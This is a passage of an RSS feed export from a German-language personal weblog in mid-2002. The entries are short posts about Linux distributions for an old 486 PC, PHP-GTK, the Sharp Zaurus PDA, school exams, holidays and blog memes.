  17222.    <content:encoded><![CDATA[Nachdem ich nun schon vielerorts von PHP-GTK gelesen habe, habe ich nun dieses <a href="" target="_blank"><b>graphische Zeugs</b></a> installiert.<br>(Mit Hilfe <a href="" target="_blank"><b>dieses</b></a> Tutorials war es gar nicht schwer :-)<br><br>Bis jetzt funktionierts IMHO gut. Nun muss ich sehen, wie ich mit der GUI-Programmierung zurechtkommen kann ;-)
  17223. ]]></content:encoded>
  17224.  </item>
  17226.  <item>
  17227.    <title>Zaurus</title>
  17228.    <link></link>
  17229.    <guid isPermaLink="true"></guid>
  17230.    <dc:creator>Andreas Jaggi</dc:creator>
  17231.    <creativeCommons:license></creativeCommons:license>
  17232.    <pubDate>Wed, 14 Aug 2002 23:05:00 +0200</pubDate>
  17233.    <category domain="">Linux</category>
  17234.    <description><![CDATA[<br><img src="" width="128" height="188" style="border: 1px solid #000000;" alt="Sharp Zaurus"><br><br>Am liebsten hätte ich so einen <a href="" target="_blank"><b>Sharp Zaurus.</b></a> IMHO eindlich ein brauchbarer PDA, denn ohne eine Tastatur - nur mit Kritzelzeichen - wirkten die bisherigen PDAs auf mich wie Kinderspielzeug.<br>Und : <b>ER LÄUFT MIT LINUX!</b><br>Doch der kostet 1099.- CHF (=1099/3*2 EURO).<br>Und deshalb siehts bei mir nur <a href=""><b>so</b></a> aus.
  17235. ]]></description>
  17236.    <content:encoded><![CDATA[<br><img src="" width="128" height="188" style="border: 1px solid #000000;" alt="Sharp Zaurus"><br><br>Am liebsten hätte ich so einen <a href="" target="_blank"><b>Sharp Zaurus.</b></a> IMHO eindlich ein brauchbarer PDA, denn ohne eine Tastatur - nur mit Kritzelzeichen - wirkten die bisherigen PDAs auf mich wie Kinderspielzeug.<br>Und : <b>ER LÄUFT MIT LINUX!</b><br>Doch der kostet 1099.- CHF (=1099/3*2 EURO).<br>Und deshalb siehts bei mir nur <a href=""><b>so</b></a> aus.
  17237. ]]></content:encoded>
  17238.  </item>
  17240.  <item>
  17241.    <title>Maturaarbeit</title>
  17242.    <link></link>
  17243.    <guid isPermaLink="true"></guid>
  17244.    <dc:creator>Andreas Jaggi</dc:creator>
  17245.    <creativeCommons:license></creativeCommons:license>
  17246.    <pubDate>Tue, 13 Aug 2002 22:24:00 +0200</pubDate>
  17247.    <category domain="">School</category>
  17248.    <description><![CDATA[<a href="" target="_blank"><b>Diesen Artikel</b></a> könnte ich vielleicht noch in meine Maturaarbeit einbauen.<br><br>Herzlichen Dank an <a href="" target="_blank"><b>tzwaen</b></a>
  17249. ]]></description>
  17250.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Diesen Artikel</b></a> könnte ich vielleicht noch in meine Maturaarbeit einbauen.<br><br>Herzlichen Dank an <a href="" target="_blank"><b>tzwaen</b></a>
  17251. ]]></content:encoded>
  17252.  </item>
  17254.  <item>
  17255.    <title>Barcode</title>
  17256.    <link></link>
  17257.    <guid isPermaLink="true"></guid>
  17258.    <dc:creator>Andreas Jaggi</dc:creator>
  17259.    <creativeCommons:license></creativeCommons:license>
  17260.    <pubDate>Tue, 13 Aug 2002 14:09:00 +0200</pubDate>
  17261.    <category domain="">Misc</category>
  17262.    <description><![CDATA[<br><img alt="Barcode für" src="" width="400" height="50"><br><br><a href="" target="_blank"><b>Hier</b></a> habe ich den <a href="" target="_blank"><b>Barcode-Generator</b></a> gefunden.
  17263. ]]></description>
  17264.    <content:encoded><![CDATA[<br><img alt="Barcode für" src="" width="400" height="50"><br><br><a href="" target="_blank"><b>Hier</b></a> habe ich den <a href="" target="_blank"><b>Barcode-Generator</b></a> gefunden.
  17265. ]]></content:encoded>
  17266.  </item>
  17268.  <item>
  17269.    <title>School is cool!</title>
  17270.    <link></link>
  17271.    <guid isPermaLink="true"></guid>
  17272.    <dc:creator>Andreas Jaggi</dc:creator>
  17273.    <creativeCommons:license></creativeCommons:license>
  17274.    <pubDate>Sun, 11 Aug 2002 16:25:00 +0200</pubDate>
  17275.    <category domain="">School</category>
  17276.    <description><![CDATA[Aus aktuellem Anlass habe ich mich entschlossen noch eine weitere Kategorie zu erstellen.<br>Die <a href=""><b>Kategorie Ausbildung</b></a>.<br>Hier schreibe ich über so uninteressante Dinge wie meine morgige Geo-Maturprüfung.<br><a href="#" class="gone"><b>Link dazu.</b></a>
  17277. ]]></description>
  17278.    <content:encoded><![CDATA[Aus aktuellem Anlass habe ich mich entschlossen noch eine weitere Kategorie zu erstellen.<br>Die <a href=""><b>Kategorie Ausbildung</b></a>.<br>Hier schreibe ich über so uninteressante Dinge wie meine morgige Geo-Maturprüfung.<br><a href="#" class="gone"><b>Link dazu.</b></a>
  17279. ]]></content:encoded>
  17280.  </item>
  17282.  <item>
  17283.    <title>ISO-Shop</title>
  17284.    <link></link>
  17285.    <guid isPermaLink="true"></guid>
  17286.    <dc:creator>Andreas Jaggi</dc:creator>
  17287.    <creativeCommons:license></creativeCommons:license>
  17288.    <pubDate>Sun, 11 Aug 2002 00:26:00 +0200</pubDate>
  17289.    <category domain="">Linux</category>
  17290.    <description><![CDATA[<br><table style="width: 100%; border: 0"><tr><td><img src="" width="60" height="70" alt="Tux"></td><td>  </td><td>Beim nächsten (grösseren) Distributions wechsel, werde ich nicht mehr mühsam selbst herunterladen sondern <a href="" target="_blank"><b>hier</b></a> eine fertige CD bestellen.<br>Dabei muss ich mir unbedingt dieses "Kreditkarten-Debian" zulegen ;-)</td></tr></table>
  17291. ]]></description>
  17292.    <content:encoded><![CDATA[<br><table style="width: 100%; border: 0"><tr><td><img src="" width="60" height="70" alt="Tux"></td><td>  </td><td>Beim nächsten (grösseren) Distributions wechsel, werde ich nicht mehr mühsam selbst herunterladen sondern <a href="" target="_blank"><b>hier</b></a> eine fertige CD bestellen.<br>Dabei muss ich mir unbedingt dieses "Kreditkarten-Debian" zulegen ;-)</td></tr></table>
  17293. ]]></content:encoded>
  17294.  </item>
  17296.  <item>
  17297.    <title>Nerina Pallot</title>
  17298.    <link></link>
  17299.    <guid isPermaLink="true"></guid>
  17300.    <dc:creator>Andreas Jaggi</dc:creator>
  17301.    <creativeCommons:license></creativeCommons:license>
  17302.    <pubDate>Sat, 10 Aug 2002 19:33:00 +0200</pubDate>
  17303.    <category domain="">Music</category>
  17304.    <description><![CDATA[Seit ich den Song <a href="#" target="_blank" class="gone"><b>Patience</b></a> von <a href="" target="_blank"><b>Nerina Pallot</b></a> im <a href="" target="_blank"><b>Webradio</b></a> gehört habe, kann ich nicht mehr ohne ;-)
  17305. ]]></description>
  17306.    <content:encoded><![CDATA[Seit ich den Song <a href="#" target="_blank" class="gone"><b>Patience</b></a> von <a href="" target="_blank"><b>Nerina Pallot</b></a> im <a href="" target="_blank"><b>Webradio</b></a> gehört habe, kann ich nicht mehr ohne ;-)
  17307. ]]></content:encoded>
  17308.  </item>
  17310.  <item>
  17311.    <title>index.php?cat=5</title>
  17312.    <link></link>
  17313.    <guid isPermaLink="true"></guid>
  17314.    <dc:creator>Andreas Jaggi</dc:creator>
  17315.    <creativeCommons:license></creativeCommons:license>
  17316.    <pubDate>Sat, 10 Aug 2002 18:08:00 +0200</pubDate>
  17317.    <category domain="">Networking</category>
  17318.    <description><![CDATA[Als ich die <a href=""><b>Kategorie Linux</b></a> einfügte, sah ich, dass bei ihrem Aufruf "...index.php?cat=5" erscheint. Als mehr oder weniger geübter LAN-Bastler assoziere ich "cat 5" aber mit Netzwerk und nicht mit Linux. So musste dann noch schnell die <a href=""><b>Kategorie Networking</b></a> entstehen und <a href="">Linux</a> wurde eine Stufe weitergeschoben. Dies interessiert vermutlich niemanden; aber es erklärt warum bis jetzt eine leere Seite erschien wenn man "...?cat=5" eingab. Nun ist dies das erste Posting in dieser Kategorie und es werden noch weitere folgen (vermutlich nicht allzu häufig ;-)
  17319. ]]></description>
  17320.    <content:encoded><![CDATA[Als ich die <a href=""><b>Kategorie Linux</b></a> einfügte, sah ich, dass bei ihrem Aufruf "...index.php?cat=5" erscheint. Als mehr oder weniger geübter LAN-Bastler assoziere ich "cat 5" aber mit Netzwerk und nicht mit Linux. So musste dann noch schnell die <a href=""><b>Kategorie Networking</b></a> entstehen und <a href="">Linux</a> wurde eine Stufe weitergeschoben. Dies interessiert vermutlich niemanden; aber es erklärt warum bis jetzt eine leere Seite erschien wenn man "...?cat=5" eingab. Nun ist dies das erste Posting in dieser Kategorie und es werden noch weitere folgen (vermutlich nicht allzu häufig ;-)
  17321. ]]></content:encoded>
  17322.  </item>
  17324.  <item>
  17325.    <title>Neue Kategorie</title>
  17326.    <link></link>
  17327.    <guid isPermaLink="true"></guid>
  17328.    <dc:creator>Andreas Jaggi</dc:creator>
  17329.    <creativeCommons:license></creativeCommons:license>
  17330.    <pubDate>Sat, 10 Aug 2002 02:49:00 +0200</pubDate>
  17331.    <category domain="">Linux</category>
  17332.    <description><![CDATA[Ab jetzt kann man all den Stuss, welchen ich in der letzten Zeit über Linux geschrieben habe (schreiben werde), in der <a href="" target="_self"><b>Kategorie Linux</b></a> finden.
  17333. ]]></description>
  17334.    <content:encoded><![CDATA[Ab jetzt kann man all den Stuss, welchen ich in der letzten Zeit über Linux geschrieben habe (schreiben werde), in der <a href="" target="_self"><b>Kategorie Linux</b></a> finden.
  17335. ]]></content:encoded>
  17336.  </item>
  17338.  <item>
  17339.    <title>Gujin: Linux boot loader</title>
  17340.    <link></link>
  17341.    <guid isPermaLink="true"></guid>
  17342.    <dc:creator>Andreas Jaggi</dc:creator>
  17343.    <creativeCommons:license></creativeCommons:license>
  17344.    <pubDate>Thu, 08 Aug 2002 13:40:00 +0200</pubDate>
  17345.    <category domain="">Linux</category>
  17346.    <description><![CDATA[Nachdem der 486er nach der 4. Installation Linux noch immer nicht aufstarten wollte, habe ich <a href="" target="_blank"><b>diesen</b></a> Boot Loader gefunden. Und siehe da, es funktioniert.<br>BTW: Nachdem Knoppix und ICEpack-Linux und Turbolinux sich nicht installieren liessen, habe ich dei Press-Edition von Redhat 7.3 draufgetan.
  17347. ]]></description>
  17348.    <content:encoded><![CDATA[Nachdem der 486er nach der 4. Installation Linux noch immer nicht aufstarten wollte, habe ich <a href="" target="_blank"><b>diesen</b></a> Boot Loader gefunden. Und siehe da, es funktioniert.<br>BTW: Nachdem Knoppix und ICEpack-Linux und Turbolinux sich nicht installieren liessen, habe ich dei Press-Edition von Redhat 7.3 draufgetan.
  17349. ]]></content:encoded>
  17350.  </item>
  17352.  <item>
  17353.    <title>ROOT Linux</title>
  17354.    <link></link>
  17355.    <guid isPermaLink="true"></guid>
  17356.    <dc:creator>Andreas Jaggi</dc:creator>
  17357.    <creativeCommons:license></creativeCommons:license>
  17358.    <pubDate>Tue, 06 Aug 2002 21:28:00 +0200</pubDate>
  17359.    <category domain="">Linux</category>
  17360.    <description><![CDATA[Zu den potentiellen Kandidaten für den 486er hat sich noch eine weitere Distribution gesellt:<br><br><a href="" target="_blank"><img src="" width="88" height="31" alt="ROOT Linux"></a><br><br>Aber zuerst wird jetzt das ISO-Image von Knoppix fertig herunterge<span style="text-decoration: line-through;">saugt</span>laden.
  17361. ]]></description>
  17362.    <content:encoded><![CDATA[Zu den potentiellen Kandidaten für den 486er hat sich noch eine weitere Distribution gesellt:<br><br><a href="" target="_blank"><img src="" width="88" height="31" alt="ROOT Linux"></a><br><br>Aber zuerst wird jetzt das ISO-Image von Knoppix fertig herunterge<span style="text-decoration: line-through;">saugt</span>laden.
  17363. ]]></content:encoded>
  17364.  </item>
  17366.  <item>
  17367.    <title>Knoppix, Phat Linux und SUSE Liveeval</title>
  17368.    <link></link>
  17369.    <guid isPermaLink="true"></guid>
  17370.    <dc:creator>Andreas Jaggi</dc:creator>
  17371.    <creativeCommons:license></creativeCommons:license>
  17372.    <pubDate>Tue, 06 Aug 2002 19:13:00 +0200</pubDate>
  17373.    <category domain="">Linux</category>
  17374.    <description><![CDATA[Irgendeine dieser Distributionen werde ich benutzen um einem alten 486er Leben einzuhauchen. ;-)<br><br><a href="" target="_blank"><b>Knoppix</b></a> - gefunden via <a href="" target="_blank"><b>andi</b></a><br><a href="" target="_blank"><b>Phat Linux</b></a><br><a href="" target="_blank"><b>SUSE Liveeval</b></a>
  17375. ]]></description>
  17376.    <content:encoded><![CDATA[Irgendeine dieser Distributionen werde ich benutzen um einem alten 486er Leben einzuhauchen. ;-)<br><br><a href="" target="_blank"><b>Knoppix</b></a> - gefunden via <a href="" target="_blank"><b>andi</b></a><br><a href="" target="_blank"><b>Phat Linux</b></a><br><a href="" target="_blank"><b>SUSE Liveeval</b></a>
  17377. ]]></content:encoded>
  17378.  </item>
  17380.  <item>
  17381.    <title>Weblog Bruder</title>
  17382.    <link></link>
  17383.    <guid isPermaLink="true"></guid>
  17384.    <dc:creator>Andreas Jaggi</dc:creator>
  17385.    <creativeCommons:license></creativeCommons:license>
  17386.    <pubDate>Tue, 06 Aug 2002 18:40:00 +0200</pubDate>
  17387.    <category domain="">Misc</category>
  17388.    <description><![CDATA[<br><a href="" target="_blank"><img src="" width="88" height="31" alt="" style="border: 1px solid #cccccc;"></a><br><br>Wie ich <a href="" target="_blank"><b>hier</b></a> feststelle, habe ich <a href="" target="_blank"><b>hier</b></a> einen Weblog Bruder bekommen. :-)
  17389. ]]></description>
  17390.    <content:encoded><![CDATA[<br><a href="" target="_blank"><img src="" width="88" height="31" alt="" style="border: 1px solid #cccccc;"></a><br><br>Wie ich <a href="" target="_blank"><b>hier</b></a> feststelle, habe ich <a href="" target="_blank"><b>hier</b></a> einen Weblog Bruder bekommen. :-)
  17391. ]]></content:encoded>
  17392.  </item>
  17394.  <item>
  17395.    <title>Damians World</title>
  17396.    <link></link>
  17397.    <guid isPermaLink="true"></guid>
  17398.    <dc:creator>Andreas Jaggi</dc:creator>
  17399.    <creativeCommons:license></creativeCommons:license>
  17400.    <pubDate>Tue, 06 Aug 2002 18:16:00 +0200</pubDate>
  17401.    <category domain="">Linux</category>
  17402.    <description><![CDATA[<a href="" target="_blank"><b></b></a> ist die Webseite eines Informatikstudenten.<br>Besitzt umfangreiche und qualitativ hochstehende Linksammlung. Insbesondere zu den Themen Linux und Apple.
  17403. ]]></description>
  17404.    <content:encoded><![CDATA[<a href="" target="_blank"><b></b></a> ist die Webseite eines Informatikstudenten.<br>Besitzt umfangreiche und qualitativ hochstehende Linksammlung. Insbesondere zu den Themen Linux und Apple.
  17405. ]]></content:encoded>
  17406.  </item>
  17408.  <item>
  17409.    <title>What Tree Did You Fall From?</title>
  17410.    <link></link>
  17411.    <guid isPermaLink="true"></guid>
  17412.    <dc:creator>Andreas Jaggi</dc:creator>
  17413.    <creativeCommons:license></creativeCommons:license>
  17414.    <pubDate>Mon, 05 Aug 2002 17:18:00 +0200</pubDate>
  17415.    <category domain="">Misc</category>
  17416.    <description><![CDATA[Der <a href="" target="_blank"><b>keltischen Astrologie</b></a> entsprechend bin ich von diesem Baum gefallen:<br><i>ELM TREE (Noble-Minded) - pleasant shape, tasteful clothes, loudest demands, tends not to forgive mistakes, cheerful, likes to lead but not to obey, honest and faithful partner, likes making decisions for others, noble-minded, generous, good sense of humor, practical.</i><br><br>Obwohl ich mich eher dem FIR TREE zugeordnet hätte.<br><br>Via <a href="" target="_blank"><b>generation NeXt</b></a>
  17417. ]]></description>
  17418.    <content:encoded><![CDATA[Der <a href="" target="_blank"><b>keltischen Astrologie</b></a> entsprechend bin ich von diesem Baum gefallen:<br><i>ELM TREE (Noble-Minded) - pleasant shape, tasteful clothes, loudest demands, tends not to forgive mistakes, cheerful, likes to lead but not to obey, honest and faithful partner, likes making decisions for others, noble-minded, generous, good sense of humor, practical.</i><br><br>Obwohl ich mich eher dem FIR TREE zugeordnet hätte.<br><br>Via <a href="" target="_blank"><b>generation NeXt</b></a>
  17419. ]]></content:encoded>
  17420.  </item>
  17422.  <item>
  17423.    <title>Hilfe, ich bin besessen!</title>
  17424.    <link></link>
  17425.    <guid isPermaLink="true"></guid>
  17426.    <dc:creator>Andreas Jaggi</dc:creator>
  17427.    <creativeCommons:license></creativeCommons:license>
  17428.    <pubDate>Mon, 05 Aug 2002 17:03:00 +0200</pubDate>
  17429.    <category domain="">Misc</category>
  17430.    <description><![CDATA[<br><div style="width: 100%; text-align: center"><table style="margin-left: auto; margin-right: auto; border: 2px solid #003060; height: 15px; width: 320px; background-color: #003060; border-spacing: 0;"><tr><td style="width: 200px; background-color: #FF6800; text-align: center; font-family: 'ocr a extended', monospace; color: #000000;">62.5 %</td><td style="background-color: #003060"></td></tr></table><br>My weblog owns 62.5 % of me.<br><a href="">Does your weblog own you?</a></div>
  17431. ]]></description>
  17432.    <content:encoded><![CDATA[<br><div style="width: 100%; text-align: center"><table style="margin-left: auto; margin-right: auto; border: 2px solid #003060; height: 15px; width: 320px; background-color: #003060; border-spacing: 0;"><tr><td style="width: 200px; background-color: #FF6800; text-align: center; font-family: 'ocr a extended', monospace; color: #000000;">62.5 %</td><td style="background-color: #003060"></td></tr></table><br>My weblog owns 62.5 % of me.<br><a href="">Does your weblog own you?</a></div>
  17433. ]]></content:encoded>
  17434.  </item>
  17436.  <item>
  17437.    <title>Festerei</title>
  17438.    <link></link>
  17439.    <guid isPermaLink="true"></guid>
  17440.    <dc:creator>Andreas Jaggi</dc:creator>
  17441.    <creativeCommons:license></creativeCommons:license>
  17442.    <pubDate>Mon, 05 Aug 2002 16:55:00 +0200</pubDate>
  17443.    <category domain="">Misc</category>
  17444.    <description><![CDATA[Am 1. August war ich <a href="" target="_blank"><b>da</b></a> und am 2. und 3. August <span style="text-decoration: line-through;">musste</span>durfte ich beim Sommerfest in <a href="" target="_blank"><b>Zweisimmen</b></a> helfen (jetzt bin ich Weltmeister im Abwaschen) und bis am frühen Morgen (ca. 5 Uhr) in der Bar herum<span style="text-decoration: line-through;">saufen</span>hängen.
  17445. ]]></description>
  17446.    <content:encoded><![CDATA[Am 1. August war ich <a href="" target="_blank"><b>da</b></a> und am 2. und 3. August <span style="text-decoration: line-through;">musste</span>durfte ich beim Sommerfest in <a href="" target="_blank"><b>Zweisimmen</b></a> helfen (jetzt bin ich Weltmeister im Abwaschen) und bis am frühen Morgen (ca. 5 Uhr) in der Bar herum<span style="text-decoration: line-through;">saufen</span>hängen.
  17447. ]]></content:encoded>
  17448.  </item>
  17450.  <item>
  17451.    <title>Portrait</title>
  17452.    <link></link>
  17453.    <guid isPermaLink="true"></guid>
  17454.    <dc:creator>Andreas Jaggi</dc:creator>
  17455.    <creativeCommons:license></creativeCommons:license>
  17456.    <pubDate>Mon, 05 Aug 2002 16:43:00 +0200</pubDate>
  17457.    <category domain="">Misc</category>
  17458.    <description><![CDATA[<table style="border: 0; width: 100%"><tr><td style="width: 84px"><img src="" alt="Avatar" height="125" width="65"></td><td>Bei <a href="" target="_blank"><b></b></a> gibt es eine weitere "Personendarstellungsmaschine". So kommt zu <a href="">den</a> <a href="">schon</a> <a href="">vorhandenen</a> noch ein weiteres Selbstbildnis dazu.<br>Gefunden bei <a href="" target="_blank"><b>tzwaen</b></a></td></tr></table>
  17459. ]]></description>
  17460.    <content:encoded><![CDATA[<table style="border: 0; width: 100%"><tr><td style="width: 84px"><img src="" alt="Avatar" height="125" width="65"></td><td>Bei <a href="" target="_blank"><b></b></a> gibt es eine weitere "Personendarstellungsmaschine". So kommt zu <a href="">den</a> <a href="">schon</a> <a href="">vorhandenen</a> noch ein weiteres Selbstbildnis dazu.<br>Gefunden bei <a href="" target="_blank"><b>tzwaen</b></a></td></tr></table>
  17461. ]]></content:encoded>
  17462.  </item>
  17464.  <item>
  17465.    <title>Weblog Stammbaum</title>
  17466.    <link></link>
  17467.    <guid isPermaLink="true"></guid>
  17468.    <dc:creator>Andreas Jaggi</dc:creator>
  17469.    <creativeCommons:license></creativeCommons:license>
  17470.    <pubDate>Mon, 05 Aug 2002 16:28:00 +0200</pubDate>
  17471.    <category domain="">Misc</category>
  17472.    <description><![CDATA[<br><a href="" title="Blog Pedigree" target="_blank"><img alt="Blog Pedigree Logo" src="" width="80" height="18"></a><br><br>Auf <a href="" target="_blank"><b></b></a> kann man seinen Weblog eintragen und die "Eltern" seines Weblogs angeben. Leider erinnere ich mich nicht mehr an alle Weblogs, welche zur Entstehung des x-log beigetragen haben. Wer sich vergessen fühlt soll sich melden. ;-)<br><br>Gefunden bei <a href="" target="_blank"><b>Pepino</b></a>
  17473. ]]></description>
  17474.    <content:encoded><![CDATA[<br><a href="" title="Blog Pedigree" target="_blank"><img alt="Blog Pedigree Logo" src="" width="80" height="18"></a><br><br>Auf <a href="" target="_blank"><b></b></a> kann man seinen Weblog eintragen und die "Eltern" seines Weblogs angeben. Leider erinnere ich mich nicht mehr an alle Weblogs, welche zur Entstehung des x-log beigetragen haben. Wer sich vergessen fühlt soll sich melden. ;-)<br><br>Gefunden bei <a href="" target="_blank"><b>Pepino</b></a>
  17475. ]]></content:encoded>
  17476.  </item>
  17478.  <item>
  17479.    <title>Linux läuft wieder</title>
  17480.    <link></link>
  17481.    <guid isPermaLink="true"></guid>
  17482.    <dc:creator>Andreas Jaggi</dc:creator>
  17483.    <creativeCommons:license></creativeCommons:license>
  17484.    <pubDate>Sun, 28 Jul 2002 21:42:00 +0200</pubDate>
  17485.    <category domain="">Linux</category>
  17486.    <description><![CDATA[Diesmal ist es nicht mehr die <a href="">hier</a> erwähnte ICE-Linux Distribution sondern <a href="" target="_blank"><b>Redhat 7.3</b></a>. Mit <a href="" target="_blank">KDE</a> konnte ich mich nicht anfreunden. Deshalb dien jetzt <a href="" target="_blank"><b>Ximian-Gnome</b></a> als Desktop Umgebung. Fenstermanager ist der standartmässig eingebundene Sawfish.<br><a href=""><b>Hier</b></a> gibts auch noch einen aktuellen Screenshot.<br>(Einen richtiger Mac kann ich mir finanziell leider noch nicht leisten. Für Spenden bitte brieflich mit mir <a href=""><b>Kontakt</b></a> aufnehmen. ;-)
  17487. ]]></description>
  17488.    <content:encoded><![CDATA[Diesmal ist es nicht mehr die <a href="">hier</a> erwähnte ICE-Linux Distribution sondern <a href="" target="_blank"><b>Redhat 7.3</b></a>. Mit <a href="" target="_blank">KDE</a> konnte ich mich nicht anfreunden. Deshalb dien jetzt <a href="" target="_blank"><b>Ximian-Gnome</b></a> als Desktop Umgebung. Fenstermanager ist der standartmässig eingebundene Sawfish.<br><a href=""><b>Hier</b></a> gibts auch noch einen aktuellen Screenshot.<br>(Einen richtiger Mac kann ich mir finanziell leider noch nicht leisten. Für Spenden bitte brieflich mit mir <a href=""><b>Kontakt</b></a> aufnehmen. ;-)
  17489. ]]></content:encoded>
  17490.  </item>
  17492.  <item>
  17493.    <title>Temperatur kann schrecklich sein</title>
  17494.    <link></link>
  17495.    <guid isPermaLink="true"></guid>
  17496.    <dc:creator>Andreas Jaggi</dc:creator>
  17497.    <creativeCommons:license></creativeCommons:license>
  17498.    <pubDate>Mon, 22 Jul 2002 22:09:00 +0200</pubDate>
  17499.    <category domain="">Misc</category>
  17500.    <description><![CDATA[Besonders wenn man gestern vom Atlantik zurückgekommen ist und heute eine Bergwanderung auf <b>3000</b> Meter über Meer macht!<br><br>Was soviel heissen will, dass ich aus Frankreich zurück bin und mir hier schrecklich kalt ist. <a href=""><b>Dieses</b></a> Gedicht handelt zwar nicht von meinem Ferienort, hat mir aber trotzdem so sehr gefallen, dass ich's jetzt <a href="">hierhin</a> mitbringe. Und (falls es jemanden ausser mir interessiert) irgendwann gibts noch einen (kleinen) Ferienbericht mit Photos.
  17501. ]]></description>
  17502.    <content:encoded><![CDATA[Besonders wenn man gestern vom Atlantik zurückgekommen ist und heute eine Bergwanderung auf <b>3000</b> Meter über Meer macht!<br><br>Was soviel heissen will, dass ich aus Frankreich zurück bin und mir hier schrecklich kalt ist. <a href=""><b>Dieses</b></a> Gedicht handelt zwar nicht von meinem Ferienort, hat mir aber trotzdem so sehr gefallen, dass ich's jetzt <a href="">hierhin</a> mitbringe. Und (falls es jemanden ausser mir interessiert) irgendwann gibts noch einen (kleinen) Ferienbericht mit Photos.
  17503. ]]></content:encoded>
  17504.  </item>
  17506.  <item>
  17507.    <title>Moustey</title>
  17508.    <link></link>
  17509.    <guid isPermaLink="true"></guid>
  17510.    <dc:creator>Andreas Jaggi</dc:creator>
  17511.    <creativeCommons:license></creativeCommons:license>
  17512.    <pubDate>Thu, 11 Jul 2002 13:55:00 +0200</pubDate>
  17513.    <category domain="">Misc</category>
  17514.    <description><![CDATA[heisst der <a href="" target="_blank"><b>Ort</b></a>, wo ich die nächsten 10 Tage etwas Erholung suchen werde. ;-)<br><br><div style="width: 100%; text-align: center"><img src="" height="186" width="325" style="border: 1px solid #000000;" alt="Seekiefern in Moustey"></div><br><b>Schöne Ferien!</b>
  17515. ]]></description>
  17516.    <content:encoded><![CDATA[heisst der <a href="" target="_blank"><b>Ort</b></a>, wo ich die nächsten 10 Tage etwas Erholung suchen werde. ;-)<br><br><div style="width: 100%; text-align: center"><img src="" height="186" width="325" style="border: 1px solid #000000;" alt="Seekiefern in Moustey"></div><br><b>Schöne Ferien!</b>
  17517. ]]></content:encoded>
  17518.  </item>
  17520.  <item>
  17521.    <title>Ist das bedenklich?</title>
  17522.    <link></link>
  17523.    <guid isPermaLink="true"></guid>
  17524.    <dc:creator>Andreas Jaggi</dc:creator>
  17525.    <creativeCommons:license></creativeCommons:license>
  17526.    <pubDate>Wed, 10 Jul 2002 23:21:00 +0200</pubDate>
  17527.    <category domain="">Misc</category>
  17528.    <description><![CDATA[<a href=""><b>Hier</b></a> ist ersichtlich wie es um meine Windows Partitionen steht. Schon lustig wie man fast 40% einer Partition mit fragmentierten Daten <b>zumüllen</b> kann. ;o)
  17529. ]]></description>
  17530.    <content:encoded><![CDATA[<a href=""><b>Hier</b></a> ist ersichtlich wie es um meine Windows Partitionen steht. Schon lustig wie man fast 40% einer Partition mit fragmentierten Daten <b>zumüllen</b> kann. ;o)
  17531. ]]></content:encoded>
  17532.  </item>
  17534.  <item>
  17535.    <title>Schade, dass ...</title>
  17536.    <link></link>
  17537.    <guid isPermaLink="true"></guid>
  17538.    <dc:creator>Andreas Jaggi</dc:creator>
  17539.    <creativeCommons:license></creativeCommons:license>
  17540.    <pubDate>Tue, 09 Jul 2002 19:22:00 +0200</pubDate>
  17541.    <category domain="">Misc</category>
  17542.    <description><![CDATA[<br><img src="" width="120" height="100" alt="Rubens Bertogliati" title="Rubens Bertogliati" style="border: 1px solid #000000;"><br><br>... <b><a href=";RaceType=TDF&amp;RaceYear=2002&amp;Language=FRA&amp;PersonName=153" target="_blank">Rubens</a> <a href=";LangueID=1&amp;SportID=18" target="_blank">Bertogliati</a></b> das <a href=";name=pro2.jpg&amp;width=500&amp;height=375&amp;proportion=1&amp;format=jpeg&amp;quality=40" target="_blank"><b>maillot jaune</b></a> an <b><a href=";RaceType=TDF&amp;RaceYear=2002&amp;Language=FRA&amp;PersonName=011" target="_blank">Erik</a> <a href=";LangueID=1&amp;SportID=18" target="_blank">Zabel</a></b> abgeben musste. Aber das wird sich im Verlauf der <a href="" target="_blank"><b>Tour de France</b></a> sicherlich noch mehrmals ändern ...
  17543. ]]></description>
  17544.    <content:encoded><![CDATA[<br><img src="" width="120" height="100" alt="Rubens Bertogliati" title="Rubens Bertogliati" style="border: 1px solid #000000;"><br><br>... <b><a href=";RaceType=TDF&amp;RaceYear=2002&amp;Language=FRA&amp;PersonName=153" target="_blank">Rubens</a> <a href=";LangueID=1&amp;SportID=18" target="_blank">Bertogliati</a></b> das <a href=";name=pro2.jpg&amp;width=500&amp;height=375&amp;proportion=1&amp;format=jpeg&amp;quality=40" target="_blank"><b>maillot jaune</b></a> an <b><a href=";RaceType=TDF&amp;RaceYear=2002&amp;Language=FRA&amp;PersonName=011" target="_blank">Erik</a> <a href=";LangueID=1&amp;SportID=18" target="_blank">Zabel</a></b> abgeben musste. Aber das wird sich im Verlauf der <a href="" target="_blank"><b>Tour de France</b></a> sicherlich noch mehrmals ändern ...
  17545. ]]></content:encoded>
  17546.  </item>
  17548.  <item>
  17549.    <title>Unix-AG</title>
  17550.    <link></link>
  17551.    <guid isPermaLink="true"></guid>
  17552.    <dc:creator>Andreas Jaggi</dc:creator>
  17553.    <creativeCommons:license></creativeCommons:license>
  17554.    <pubDate>Mon, 08 Jul 2002 19:55:00 +0200</pubDate>
  17555.    <category domain="">Linux</category>
  17556.    <description><![CDATA[Die <a href="" target="_blank"><b>Unix-AG</b></a> bietet auf ihrer Website viele Infos rund um Unix/Linux. IMHO sehr hilfreich für Um- und Einsteiger wie mich. Besonders die <a href="" target="_blank"><b>Links für Einsteiger</b></a> haben mir grosse Freude (und Erleichterung) ;-) bereitet.
  17557. ]]></description>
  17558.    <content:encoded><![CDATA[Die <a href="" target="_blank"><b>Unix-AG</b></a> bietet auf ihrer Website viele Infos rund um Unix/Linux. IMHO sehr hilfreich für Um- und Einsteiger wie mich. Besonders die <a href="" target="_blank"><b>Links für Einsteiger</b></a> haben mir grosse Freude (und Erleichterung) ;-) bereitet.
  17559. ]]></content:encoded>
  17560.  </item>
  17562.  <item>
  17563.    <title>PHP</title>
  17564.    <link></link>
  17565.    <guid isPermaLink="true"></guid>
  17566.    <dc:creator>Andreas Jaggi</dc:creator>
  17567.    <creativeCommons:license></creativeCommons:license>
  17568.    <pubDate>Mon, 08 Jul 2002 19:20:00 +0200</pubDate>
  17569.    <category domain="">Coding</category>
  17570.    <description><![CDATA[Auf <a href="" target="_blank"><b></b></a> hat es verschiedene PHP-Klassen, unter anderem auch zum Thema XML/RSS. Vielleicht kann der/die eine oder andere etwas davon für seinen Weblog brauchen (mir ist's so ergangen) :-)
  17571. ]]></description>
